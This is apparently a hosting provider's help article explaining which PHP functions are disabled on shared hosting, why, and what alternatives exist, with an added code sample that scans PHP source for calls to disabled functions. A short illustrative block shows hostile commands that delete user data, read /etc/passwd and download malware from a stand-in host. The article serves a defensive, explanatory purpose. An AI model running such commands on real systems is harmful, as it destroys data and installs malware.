Overview
On shared hosting environments (both cPanel and DirectAdmin), certain PHP functions are disabled to protect the server and all hosted websites from security threats. This is an industry-standard security practice followed by all major hosting providers.
This article explains which functions are disabled, why they pose security risks, and what solutions are available if your application requires these functions.
- All cPanel Shared Hosting Plans
- All DirectAdmin Shared Hosting Plans
Why Are Some PHP Functions Disabled?
Shared hosting means hundreds of websites share the same server. If one website is compromised (through weak passwords, outdated plugins, or vulnerabilities), attackers could potentially:
- Attack other websites on the same server
- Send spam emails damaging the server's reputation
- Steal sensitive data from databases
- Use the server for illegal activities
- Cause the server IP to be blacklisted, affecting all customers
By disabling dangerous functions, we ensure that even if one website is compromised, the damage remains contained and cannot spread to other customers.
List of Disabled PHP Functions
1. Command Execution Functions
These functions allow PHP to execute system commands directly on the server.
| Function | Risk Level | Why Disabled |
|---|---|---|
| exec() | Critical | Executes system commands. Attackers can run malicious commands on the server. |
| shell_exec() | Critical | Executes commands via shell. Can be used to take complete control of the server. |
| system() | Critical | Executes external programs. Allows arbitrary command execution. |
| passthru() | Critical | Executes commands and displays raw output. |
| popen() | Critical | Opens process file pointer. Can execute arbitrary commands. |
| proc_open() | Critical | Execute a command and open file pointers for I/O. |
| proc_close() | High | Closes a process opened by proc_open(). |
| proc_get_status() | High | Get information about a process. |
| proc_terminate() | High | Kills a process opened by proc_open(). |
| proc_nice() | Medium | Change process priority. Can affect server performance. |
| pcntl_exec() | Critical | Executes program in current process space. |
| pcntl_fork() | Critical | Creates child processes. Can overload the server. |
| pcntl_signal() | High | Installs signal handlers. |
| pcntl_waitpid() | High | Waits on or returns status of forked child. |
| pcntl_alarm() | Medium | Set an alarm clock for delivery of a signal. |
// If exec() was enabled, an attacker could run:
exec('rm -rf /home/*'); // Delete all user data
exec('cat /etc/passwd'); // Read system files
exec('wget malware.com/virus'); // Download malware
exec('mail -s "Spam" victim@..'); // Send spam from your server
2. Network/Socket Functions
These functions allow PHP to make outbound network connections.
| Function | Risk Level | Why Disabled |
|---|---|---|
| curl_exec() | High | Executes cURL session. Can make unauthorized outbound connections for data theft. |
| curl_multi_exec() | High | Runs multiple cURL handles simultaneously. |
| fsockopen() | High | Opens socket connection. Can bypass firewall and exfiltrate data. |
| pfsockopen() | High | Persistent socket connection. Same risks as fsockopen(). |
| stream_socket_client() | High | Create socket connection. Alternative method to fsockopen(). |
| stream_socket_server() | High | Create server socket. Can open unauthorized ports on the server. |
| socket_create() | High | Create raw socket. Low-level network access. |
| socket_connect() | High | Connect socket to destination. |
| socket_bind() | High | Bind socket to an address. |
| socket_listen() | High | Listen for connections on a socket. |
| socket_accept() | High | Accept a connection on a socket. |
- SSRF Attacks (Server-Side Request Forgery): Access internal services like databases, admin panels, and cloud metadata APIs
- Data Exfiltration: Silently send stolen customer data (credit cards, passwords, personal info) to external attacker servers
- Botnet Participation: Make your server part of a network used for DDoS attacks
- Spam Distribution: Send thousands of spam emails through your server
- IP Blacklisting: Server IP gets blacklisted, affecting email delivery for ALL customers on the server
3. File System Functions
| Function | Risk Level | Why Disabled |
|---|---|---|
| symlink() | High | Creates symbolic links. Can potentially access files outside allowed directories. |
| link() | High | Creates hard links. Similar risks to symlink(). |
4. Information Disclosure Functions
| Function | Risk Level | Why Disabled |
|---|---|---|
| phpinfo() | Medium | Displays complete PHP configuration including server paths, versions, and security settings. |
| show_source() | High | Displays source code of PHP files. Can expose passwords and application logic. |
| highlight_file() | High | Syntax highlights and displays file contents. Same risks as show_source(). |
To check the PHP configuration, use an SSH terminal:
php -i | less
5. Environment & System Functions
| Function | Risk Level | Why Disabled |
|---|---|---|
| dl() | Critical | Loads PHP extension at runtime. Can load malicious extensions. |
| ini_alter() | High | Alias of ini_set(). Can change PHP security settings. |
| apache_setenv() | Medium | Sets Apache environment variable. |
| apache_child_terminate() | Medium | Terminate Apache child process after request. |
| virtual() | Medium | Performs Apache sub-request. |
| openlog() | Medium | Opens connection to system logger. |
| syslog() | Medium | Generates system log message. Can fill logs with garbage. |
6. POSIX Functions
POSIX functions interact directly with the operating system.
| Function | Risk Level | Why Disabled |
|---|---|---|
| posix_kill() | Critical | Sends signal to process. Can kill critical server processes. |
| posix_setuid() | Critical | Sets user ID. Can escalate privileges to root. |
| posix_setgid() | Critical | Sets group ID. Can escalate privileges. |
| posix_seteuid() | Critical | Sets effective user ID. |
| posix_setegid() | Critical | Sets effective group ID. |
| posix_mkfifo() | High | Creates FIFO special file (named pipe). |
| posix_getpwuid() | Medium | Returns user information by user ID. |
| posix_uname() | Low | Returns system information. |
Complete List of Disabled Functions
Applications That May Be Affected
| Application Type | Functions Needed | Recommended Solution |
|---|---|---|
| E-commerce Payment Gateways (Razorpay, PayU, CCAvenue, PayPal, Stripe) | curl_exec, fsockopen | VPS Hosting |
| OpenCart / PrestaShop / Magento / WooCommerce (with payment integrations) | curl_exec, stream_socket_client | VPS Hosting |
| SMS API Integrations (Twilio, MSG91, TextLocal) | curl_exec, fsockopen | VPS Hosting |
| Email Marketing Tools (Mailchimp API, SendGrid) | curl_exec, socket functions | VPS Hosting |
| Video/Image Processing (FFmpeg, ImageMagick via CLI) | exec, shell_exec | VPS Hosting |
| Git/Composer Deployment | exec, proc_open | VPS Hosting |
| Backup Plugins (UpdraftPlus, BackupBuddy) | exec, system | Use cPanel/DirectAdmin Backup |
| WordPress with External APIs | Depends on plugin | Most plugins work; payment plugins need VPS |
What Functions ARE Allowed?
Many common operations still work perfectly. The cURL extension is enabled - only the execution function is restricted.
cURL Functions:
File Functions:
Database Functions:
Other:
Solutions If You Need Disabled Functions
🚀 Option 1: Upgrade to VPS Hosting (Recommended)
VPS (Virtual Private Server) hosting gives you complete control over your server environment.
VPS Benefits:
Ideal For:
🔧 Option 2: Use Control Panel Built-in Features
| Instead Of | Use This (cPanel) | Use This (DirectAdmin) |
|---|---|---|
| Backup plugins using exec() | cPanel → Backup / Backup Wizard | DirectAdmin → Create/Restore Backups |
| Cron jobs with shell commands | cPanel → Cron Jobs | DirectAdmin → Cronjobs |
| phpinfo() for debugging | SSH: php -i \| less | |
| File Manager operations | cPanel → File Manager | DirectAdmin → File Manager |
| Database management | cPanel → phpMyAdmin | DirectAdmin → phpMyAdmin |
Frequently Asked Questions
Q: Can you enable these functions for my account only?
A: No. PHP's disable_functions directive is a server-wide security setting and cannot be overridden for individual accounts on shared hosting. This ensures consistent security for all customers.
Q: My WordPress site works fine. Why would I need these functions?
A: Basic WordPress functionality works without these functions. You only need them for specific use cases like payment gateway plugins (WooCommerce with Razorpay/Stripe), external API integrations, or image/video processing.
Q: Is this restriction unique to DomainIndia?
A: No. This is an industry-standard security practice. All major hosting providers (GoDaddy, Bluehost, Hostinger, SiteGround, HostGator) disable these functions on shared hosting for the same security reasons.
Q: How do I know if my application needs these functions?
A: Check your application's error logs. If you see errors like:
"curl_exec() has been disabled for security reasons"
"fsockopen() has been disabled for security reasons"
Then your application requires VPS hosting.
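Error logs only show calls that have already run, and a plain text search over-reports because methods such as PDO::exec() share a name with a disabled function. The following added example (not part of the original article or the host's tooling) scans PHP source with the tokenizer instead; the function name find_disabled_calls, the sample source and the three-function list are assumptions made for illustration.

```php
<?php
// Added example: report plain calls to disabled functions in PHP source.
// Dynamic calls ($f(), call_user_func('exec')) are not detected.

function find_disabled_calls(string $source, array $disabled): array
{
    $disabled = array_flip(array_map('strtolower', $disabled));
    // Drop whitespace and comments so neighbouring tokens are meaningful.
    $tokens = array_values(array_filter(token_get_all($source), function ($t) {
        return !is_array($t)
            || !in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true);
    }));
    // A name after one of these is a method, static call or declaration,
    // not the global function: $pdo->exec() is PDO::exec(), not exec().
    $notGlobal = [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION, T_NEW];
    if (defined('T_NULLSAFE_OBJECT_OPERATOR')) {      // PHP 8.0+
        $notGlobal[] = T_NULLSAFE_OBJECT_OPERATOR;
    }
    $hits = [];
    foreach ($tokens as $i => $t) {
        // Only identifiers directly followed by "(" can be calls.
        if (!is_array($t) || ($tokens[$i + 1] ?? null) !== '(') {
            continue;
        }
        // PHP 8 tokenizes "\exec" as one fully qualified name token.
        $isName = $t[0] === T_STRING || (defined('T_NAME_FULLY_QUALIFIED')
            && $t[0] === T_NAME_FULLY_QUALIFIED);
        $name = strtolower(ltrim($t[1], '\\'));
        $prev = $tokens[$i - 1] ?? null;
        $isMember = is_array($prev) && in_array($prev[0], $notGlobal, true);
        if ($isName && isset($disabled[$name]) && !$isMember) {
            $hits[] = [$name, $t[2]];   // [function, line number]
        }
    }
    return $hits;
}

// Constructed sample source, not taken from a real application.
$sample = <<<'PHP'
<?php
$rows = $pdo->exec('DELETE FROM cache');
$body = curl_exec(curl_init('https://api.example.test'));
// exec('mentioned only in a comment');
$out = \shell_exec('convert in.png out.jpg');
PHP;
foreach (find_disabled_calls($sample, ['exec', 'shell_exec', 'curl_exec']) as [$fn, $line]) {
    echo "line $line: $fn()\n";
}
```

On PHP 8.0 and later a disabled function is treated as undefined, so the error log shows "Call to undefined function curl_exec()" instead of the "has been disabled for security reasons" warning quoted above.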
Q: Will upgrading PHP version enable these functions?
A: No. These functions are disabled across all PHP versions (5.6, 7.x, 8.x) on shared hosting servers.
Q: I'm running an e-commerce store. What should I do?
A: For e-commerce stores requiring payment gateway integration (Razorpay, PayU, CCAvenue, Stripe, PayPal), we strongly recommend VPS hosting. It provides the necessary functions plus better performance and security for handling transactions.
Security Measures on Our Shared Hosting
Even with function restrictions, your hosting includes enterprise-grade security:
| Protection | Description |
|---|---|
| 🔒 CloudLinux CageFS | Complete filesystem isolation - users cannot see or access other accounts |
| 🛡️ Imunify360 | Real-time malware scanning, proactive defense, and automatic cleanup |
| 🔥 ModSecurity WAF | Web Application Firewall with comprehensive ruleset blocking attacks |
| 🧱 CSF Firewall | Advanced firewall with brute-force protection and intrusion detection |
| 💾 Daily Backups | Automatic daily backups with easy restore options |
| 🔐 Free SSL Certificates | Let's Encrypt SSL automatically issued for all domains |
| 📧 Spam Protection | SpamAssassin and email authentication (SPF, DKIM, DMARC) |
Need Help?
If you have questions about disabled functions or need help finding an alternative solution, our support team is here to help:
| 📧 Email: [email protected] | 💬 Live Chat: Available |
| 🎫 Support Ticket: Submit a Ticket | 📞 Phone: Check Contact Page |
Article ID: KB-PHP-DISABLED-001
Last Updated: December 2024
Applies To: All cPanel & DirectAdmin Shared Hosting Plans
Category: Web Hosting Essentials → Advanced Hosting Techniques